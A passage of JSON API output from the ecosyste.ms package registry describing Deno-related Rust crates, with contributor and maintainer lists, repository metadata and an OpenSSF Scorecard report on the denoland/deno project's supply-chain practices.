tHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":386,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":188,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/napi_sym/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/napi_sym/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/napi_sym/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/napi_sym/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/napi_sym/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/napi_sym/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-08T07:01:34.999Z","updated_at":"2022-11-08T07:01:34.999Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:29.418Z","updated_at":"2023-07-18T22:41:29.418Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":14712020,"name":"deno_print","ecosystem":"cargo","description":"Print macros that don't panic on broken pipes, for Deno crates","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":5,"first_release_published_at":"2026-07-03T09:38:50.220Z","latest_release_published_at":"2026-08-06T11:48:24.093Z","latest_release_number":"0.5.0","last_synced_at":"2026-08-29T21:57:24.970Z","created_at":"2026-07-03T12:30:22.066Z","updated_at":"2026-08-29T21:57:24.970Z","registry_url":"https://crates.io/crates/deno_print/","install_command":"cargo install deno_print","documentation_url":"https://docs.rs/deno_print/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.